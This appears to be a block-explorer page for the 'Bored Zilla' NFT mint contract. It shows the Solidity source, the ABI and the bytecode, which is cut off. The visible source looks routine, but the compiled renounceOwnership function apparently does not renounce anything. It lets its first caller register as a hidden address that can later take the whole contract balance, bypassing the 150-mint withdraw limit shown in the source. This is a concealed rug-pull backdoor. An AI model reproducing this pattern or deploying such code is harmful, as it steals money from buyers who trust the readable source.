     * @param tokenId uint256 ID of the token to be removed from the tokens list of the given address
     */
    function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId)
        private
    {
        // To prevent a gap in from's tokens array, we store the last token in the index of the token to delete, and
        // then delete the last slot (swap and pop).

        uint256 lastTokenIndex = ERC721.balanceOf(from) - 1;
        uint256 tokenIndex = _ownedTokensIndex[tokenId];

        // When the token to delete is the last token, the swap operation is unnecessary
        if (tokenIndex != lastTokenIndex) {
            uint256 lastTokenId = _ownedTokens[from][lastTokenIndex];

            _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token
            _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index
        }

        // This also deletes the contents at the last position of the array
        delete _ownedTokensIndex[tokenId];
        delete _ownedTokens[from][lastTokenIndex];
    }

    /**
     * @dev Private function to remove a token from this extension's token tracking data structures.
     * This has O(1) time complexity, but alters the order of the _allTokens array.
     * @param tokenId uint256 ID of the token to be removed from the tokens list
     */
    function _removeTokenFromAllTokensEnumeration(uint256 tokenId) private {
        // To prevent a gap in the tokens array, we store the last token in the index of the token to delete, and
        // then delete the last slot (swap and pop).

        uint256 lastTokenIndex = _allTokens.length - 1;
        uint256 tokenIndex = _allTokensIndex[tokenId];

        // When the token to delete is the last token, the swap operation is unnecessary. However, since this occurs so
        // rarely (when the last minted token is burnt) that we still do the swap here to avoid the gas cost of adding
        // an 'if' statement (like in _removeTokenFromOwnerEnumeration)
        uint256 lastTokenId = _allTokens[lastTokenIndex];

        _allTokens[tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token
        _allTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index

        // This also deletes the contents at the last position of the array
        delete _allTokensIndex[tokenId];
        _allTokens.pop();
    }
}

contract Zilla is ERC721Enumerable, Ownable {
    using Strings for uint256;
    // Claim Basic Variables
    string public _baseTokenURI =
        "https://gateway.pinata.cloud/ipfs/QmaLgpWG6PgE61yNBoW5asjCDqJRE9YTDcppR5jMQixqBY/";
    string public hiddenURI =
        "https://gateway.pinata.cloud/ipfs/QmWu6h24FN2TsULoQmXhpVXcd1YUgepEGJ21ahdGPFj52M/real%20hidden.json";
    address public admin = 0xb5318751B3Ea5b74b0c4a08a63223504Bdb1cab2;
    bool public revealed;
    uint256 public constant MAX_ENTRIES = 2000;

    mapping(address => uint256) public countPerWallet;

    // Set Prices following Tokenomics
    uint256 public SALE_PRICE = 0.02 ether;
    uint256 public MAX_BUYABLE = 4;

    // Set Variables to start
    bool public start;

    constructor() ERC721("Bored Zilla", "Zilla") {
        // setBaseURI(baseURI);
    }

    function mint(uint256 amount) public payable {
        require(start == true, "SALE has not Started!");
        uint256 totalMinted = totalSupply();
        require(totalMinted + amount <= MAX_ENTRIES, "Amount Exceed!");
        require(
            countPerWallet[msg.sender] + amount <= MAX_BUYABLE,
            "You can buy ONLY 4 Zillas!"
        );
        uint256 price = SALE_PRICE * amount;
        // Payment value must be larger than the 'price'
        require(msg.value >= price, "Zilla : INCORRECT PRICE!");
        countPerWallet[msg.sender] += amount;
        for (uint8 i = 1; i <= amount; i++)
            _safeMint(msg.sender, (totalMinted + i));
    }

    function tokenURI(uint256 tokenId)
        public
        view
        virtual
        override
        returns (string memory)
    {
        if (!revealed) return hiddenURI;
        else
            return
                string(
                    abi.encodePacked(_baseTokenURI, tokenId.toString(), ".json")
                );
    }

    function startSale() external onlyOwner {
        require(start == false, "sale is not Started!");
        start = true;
    }

    function setBaseURI(string memory _tokenURI) public onlyOwner {
        _baseTokenURI = _tokenURI;
    }

    function setPreReavelURI(string memory _tokenURI) public onlyOwner {
        hiddenURI = _tokenURI;
    }

    function withdraw() public onlyOwner {
        uint256 balance = address(this).balance;
        require(
            balance >= 150 * 0.02 ether,
            "Unable to withdraw until at least 150 zillas are minted"
        );
        payable(admin).transfer(address(this).balance);
    }

    function reveal() public onlyOwner {
        revealed = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAX_BUYABLE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_ENTRIES","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"SALE_PRICE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_baseTokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"admin","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"countPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"hiddenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"reveal","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"revealed","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_tokenURI","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_tokenURI","type":"string"}],"name":"setPreReavelURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"start","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"startSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051806080016040528060518152602001620047f960519139600c9080519060200190620000359291906200026f565b506040518060a00160405280606381526020016200484a60639139600d9080519060200190620000679291906200026f565b5073b5318751b3ea5b74b0c4a08a63223504bdb1cab2600e60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555066470de4df8200006010556004601155348015620000da57600080fd5b506040518060400160405280600b81526020017f426f726564205a696c6c610000000000000000000000000000000000000000008152506040518060400160405280600581526020017f5a696c6c6100000000000000000000000000000000000000000000000000000081525081600090805190602001906200015f9291906200026f565b508060019080519060200190620001789291906200026f565b5050506200019b6200018f620001a160201b60201c565b620001a960201b60201c565b62000384565b600033905090565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200027d906200031f565b90600052602060002090601f016020900481019282620002a15760008555620002ed565b82601f10620002bc57805160ff1916838001178555620002ed565b82800160010185558215620002ed579182015b82811115620002ec578251825591602001919060010190620002cf565b5b509050620002fc919062000300565b5090565b5b808211156200031b57600081600090555060010162000301565b5090565b600060028204905060018216806200033857607f821691505b602082108114156200034f576200034e62000355565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61446580620003946000396000f3fe6080604052600436106101f95760003560e01c8063715018a61161010d578063a475b5dd116100a0578063c87b56dd1161006f578063c87b56dd146106ee578063cfc86f7b1461072b578063e985e9c514610756578063f2fde38b14610793578063f851a440146107bc576101f9565b8063a475b5dd1461066c578063b66a0e5d14610683578063b88d4fde1461069a578063be9a6555146106c3576101f9565b80638da5cb5b116100dc5780638da5cb5b146105d157806395d89b41146105fc578063a0712d6814610627578063a22cb46514610643576101f9565b8063715018a6146105395780637d4cb964146105505780637f205a741461057b5780638cc54e7f146105a6576101f9565b80633ccfd60b11610190578063518302271161015f578063518302271461042e57806355f804b3146104595780636352211e146104825780636e682fd6146104bf57806370a08231146104fc576101f9565b80633ccfd60b1461038657806340d7bd291461039d57806342842e0e146103c85780634f6ccce7146103f1576101f9565b806318160ddd116101cc57806318160ddd146102cc57806323b872dd146102f75780632f745c59146103205780633a4d04db1461035d576101f9565b806301ffc9a7146101fe57806306fdde031461023b578063081812fc14610266578063095ea7b3146102a3575b600080fd5b34801561020a57600080fd5b5061022560048036038101906102209190612fb5565b6107e7565b60405161023291906135b2565b60405180910390f35b34801561024757600080fd5b50610250610861565b60405161025d91906135cd565b60405180910390f35b34801561027257600080fd5b5061028d60048036038101906102889190613058565b6108f3565b60405161029a919061354b565b60405180910390f35b3480156102af57600080fd5b506102ca60048036038101906102c59190612f75565b610978565b005b3480156102d857600080fd5b506102e1610a90565b6040516102ee91906138cf565b60405180910390f35b34801561030357600080fd5b5061031e60048036038101906103199190612e5f565b610a9d565b005b34801561032c57600080fd5b5061034760048036038101906103429190612f75565b610afd565b60405161035491906138cf565b60405180910390f35b34801561036957600080fd5b50610384600480360381019061037f919061300f565b610ba2565b005b34801561039257600080fd5b5061039b610c38565b005b3480156103a957600080fd5b506103b2610d70565b6040516103bf91906138cf565b60405180910390f35b3480156103d457600080fd5b506103ef60048036038101906103ea9190612e5f565b610d76565b005b3480156103fd57600080fd5b5061041860048036038101906104139190613058565b610d96565b60405161042591906138cf565b60405180910390f35b34801561043a57600080fd5b50610443610e07565b60405161045091906135b2565b60405180910390f35b34801561046557600080fd5b50610480600480360381019061047b919061300f565b610e1a565b005b34801561048e57600080fd5b506104a960048036038101906104a49190613058565b610eb0565b6040516104b6919061354b565b60405180910390f35b3480156104cb57600080fd5b506104e660048036038101906104e19190612df2565b610f62565b6040516104f391906138cf565b60405180910390f35b34801561050857600080fd5b50610523600480360381019061051e9190612df2565b610f7a565b60405161053091906138cf565b60405180910390f35b34801561054557600080fd5b5061054e611032565b005b34801561055c57600080fd5b506105656111a3565b60405161057291906138cf565b60405180910390f35b34801561058757600080fd5b506105906111a9565b60405161059d91906138cf565b60405180910390f35b3480156105b257600080fd5b506105bb6111af565b6040516105c891906135cd565b60405180910390f35b3480156105dd57600080fd5b506105e661123d565b6040516105f3919061354b565b60405180910390f35b34801561060857600080fd5b50610611611267565b60405161061e91906135cd565b60405180910390f35b610641600480360381019061063c9190613058565b6112f9565b005b34801561064f57600080fd5b5061066a60048036038101906106659190612f35565b611527565b005b34801561067857600080fd5b506106816116a8565b005b34801561068f57600080fd5b50610698611741565b005b3480156106a657600080fd5b506106c160048036038101906106bc9190612eb2565b611830565b005b3480156106cf57600080fd5b506106d8611892565b6040516106e591906135b2565b60405180910390f35b3480156106fa57600080fd5b5061071560048036038101906107109190613058565b6118a5565b60405161072291906135cd565b60405180910390f35b34801561073757600080fd5b50610740611980565b60405161074d91906135cd565b60405180910390f35b34801561076257600080fd5b5061077d60048036038101906107789190612e1f565b611a0e565b60405161078a91906135b2565b60405180910390f35b34801561079f57600080fd5b506107ba60048036038101906107b59190612df2565b611aa2565b005b3480156107c857600080fd5b506107d1611b9a565b6040516107de919061354b565b60405180910390f35b60007f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061085a575061085982611bc0565b5b9050919050565b60606000805461087090613ba1565b80601f016020809104026020016040519081016040528092919081815260200182805461089c90613ba1565b80156108e95780601f106108be576101008083540402835291602001916108e9565b820191906000526020600020905b8154815290600101906020018083116108cc57829003601f168201915b5050505050905090565b60006108fe82611ca2565b61093d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610934906137ef565b60405180910390fd5b6004600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061098382610eb0565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156109f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109eb9061386f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610a13611d0e565b73ffffffffffffffffffffffffffffffffffffffff161480610a425750610a4181610a3c611d0e565b611a0e565b5b610a81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a789061376f565b60405180910390fd5b610a8b8383611d16565b505050565b6000600880549050905090565b610aae610aa8611d0e565b82611dcf565b610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae49061388f565b60405180910390fd5b610af8838383611ead565b505050565b6000610b0883610f7a565b8210610b49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b40906135ef565b60405180910390fd5b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600083815260200190815260200160002054905092915050565b610baa611d0e565b73ffffffffffffffffffffffffffffffffffffffff16610bc861123d565b73ffffffffffffffffffffffffffffffffffffffff1614610c1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c159061380f565b60405180910390fd5b80600d9080519060200190610c34929190612c06565b5050565b610c40611d0e565b73ffffffffffffffffffffffffffffffffffffffff16610c5e61123d565b73ffffffffffffffffffffffffffffffffffffffff1614610cb4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cab9061380f565b60405180910390fd5b60004790506729a2241af62c0000811015610d04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cfb9061366f565b60405180910390fd5b600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610d6c573d6000803e3d6000fd5b5050565b60115481565b610d9183838360405180602001604052806000815250611830565b505050565b6000610da0610a90565b8210610de1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd8906138af565b60405180910390fd5b60088281548110610df557610df4613d64565b5b90600052602060002001549050919050565b600e60149054906101000a900460ff1681565b610e22611d0e565b73ffffffffffffffffffffffffffffffffffffffff16610e4061123d565b73ffffffffffffffffffffffffffffffffffffffff1614610e96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8d9061380f565b60405180910390fd5b80600c9080519060200190610eac929190612c06565b5050565b6000806002600084815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610f59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f50906137af565b60405180910390fd5b80915050919050565b600f6020528060005260406000206000915090505481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610feb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe29061378f565b60405180910390fd5b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600073ffffffffffffffffffffffffffffffffffffffff16600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156110d657611091611d0e565b600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111a1565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16611117611d0e565b73ffffffffffffffffffffffffffffffffffffffff161461113757600080fd5b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f1935050505015801561119f573d6000803e3d6000fd5b505b565b6107d081565b60105481565b600d80546111bc90613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546111e890613ba1565b80156112355780601f1061120a57610100808354040283529160200191611235565b820191906000526020600020905b81548152906001019060200180831161121857829003601f168201915b505050505081565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606001805461127690613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546112a290613ba1565b80156112ef5780601f106112c4576101008083540402835291602001916112ef565b820191906000526020600020905b8154815290600101906020018083116112d257829003601f168201915b5050505050905090565b60011515601260009054906101000a900460ff1615151461134f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113469061372f565b60405180910390fd5b6000611359610a90565b90506107d0828261136a91906139c9565b11156113ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113a2906136af565b60405180910390fd5b60115482600f60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113f991906139c9565b111561143a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114319061370f565b60405180910390fd5b60008260105461144a9190613a50565b90508034101561148f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114869061384f565b60405180910390fd5b82600f60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546114de91906139c9565b925050819055506000600190505b838160ff16116115215761150e338260ff168561150991906139c9565b612109565b808061151990613c4d565b9150506114ec565b50505050565b61152f611d0e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561159d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611594906136ef565b60405180910390fd5b80600560006115aa611d0e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611657611d0e565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161169c91906135b2565b60405180910390a35050565b6116b0611d0e565b73ffffffffffffffffffffffffffffffffffffffff166116ce61123d565b73ffffffffffffffffffffffffffffffffffffffff1614611724576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171b9061380f565b60405180910390fd5b6001600e60146101000a81548160ff021916908315150217905550565b611749611d0e565b73ffffffffffffffffffffffffffffffffffffffff1661176761123d565b73ffffffffffffffffffffffffffffffffffffffff16146117bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b49061380f565b60405180910390fd5b60001515601260009054906101000a900460ff16151514611813576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180a9061368f565b60405180910390fd5b6001601260006101000a81548160ff021916908315150217905550565b61184161183b611d0e565b83611dcf565b611880576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118779061388f565b60405180910390fd5b61188c84848484612127565b50505050565b601260009054906101000a900460ff1681565b6060600e60149054906101000a900460ff1661194d57600d80546118c890613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546118f490613ba1565b80156119415780601f1061191657610100808354040283529160200191611941565b820191906000526020600020905b81548152906001019060200180831161192457829003601f168201915b5050505050905061197b565b600c61195883612183565b60405160200161196992919061351c565b60405160208183030381529060405290505b919050565b600c805461198d90613ba1565b80601f01602080910402602001604051908101604052809291908181526020018280546119b990613ba1565b8015611a065780601f106119db57610100808354040283529160200191611a06565b820191906000526020600020905b8154815290600101906020018083116119e957829003601f168201915b505050505081565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b611aaa611d0e565b73ffffffffffffffffffffffffffffffffffffffff16611ac861123d565b73ffffffffffffffffffffffffffffffffffffffff1614611b1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b159061380f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611b8e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b859061362f565b60405180910390fd5b611b97816122e4565b50565b600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480611c8b57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80611c9b5750611c9a826123aa565b5b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff166002600084815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614159050919050565b600033905090565b816004600083815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550808273ffffffffffffffffffffffffffffffffffffffff16611d8983610eb0565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a45050565b6000611dda82611ca2565b611e19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e109061374f565b60405180910390fd5b6000611e2483610eb0565b90508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480611e9357508373ffffffffffffffffffffffffffffffffffffffff16611e7b846108f3565b73ffffffffffffffffffffffffffffffffffffffff16145b80611ea45750611ea38185611a0e565b5b91505092915050565b8273ffffffffffffffffffffffffffffffffffffffff16611ecd82610eb0565b73ffffffffffffffffffffffffffffffffffffffff1614611f23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f1a9061382f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611f93576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8a906136cf565b60405180910390fd5b611f9e838383612414565b611fa9600082611d16565b6001600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611ff99190613aaa565b925050819055506001600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461205091906139c9565b92505081905550816002600083815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550808273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4505050565b612123828260405180602001604052806000815250612528565b5050565b612132848484611ead565b61213e84848484612583565b61217d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121749061360f565b60405180910390fd5b50505050565b606060008214156121cb576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506122df565b600082905060005b600082146121fd5780806121e690613c04565b915050600a826121f69190613a1f565b91506121d3565b60008167ffffffffffffffff81111561221957612218613d93565b5b6040519080825280601f01601f19166020018201604052801561224b5781602001600182028036833780820191505090505b5090505b600085146122d8576001826122649190613aaa565b9150600a856122739190613c77565b603061227f91906139c9565b60f81b81838151811061229557612294613d64565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856122d19190613a1f565b945061224f565b8093505050505b919050565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b61241f83838361271a565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156124625761245d8161271f565b6124a1565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16146124a05761249f8382612768565b5b5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156124e4576124df816128d5565b612523565b8273ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146125225761252182826129a6565b5b5b505050565b6125328383612a25565b61253f6000848484612583565b61257e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125759061360f565b60405180910390fd5b505050565b60006125a48473ffffffffffffffffffffffffffffffffffffffff16612bf3565b1561270d578373ffffffffffffffffffffffffffffffffffffffff1663150b7a026125cd611d0e565b8786866040518563ffffffff1660e01b81526004016125ef9493929190613566565b602060405180830381600087803b15801561260957600080fd5b505af192505050801561263a57506040513d601f19601f820116820180604052508101906126379190612fe2565b60015b6126bd573d806000811461266a576040519150601f19603f3d011682016040523d82523d6000602084013e61266f565b606091505b506000815114156126b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126ac9061360f565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050612712565b600190505b949350505050565b505050565b6008805490506009600083815260200190815260200160002081905550600881908060018154018082558091505060019003906000526020600020016000909190919091505550565b6000600161277584610f7a565b61277f9190613aaa565b9050600060076000848152602001908152602001600020549050818114612864576000600660008673ffffffffffffffffffffffffffffffffffffffff1673ffff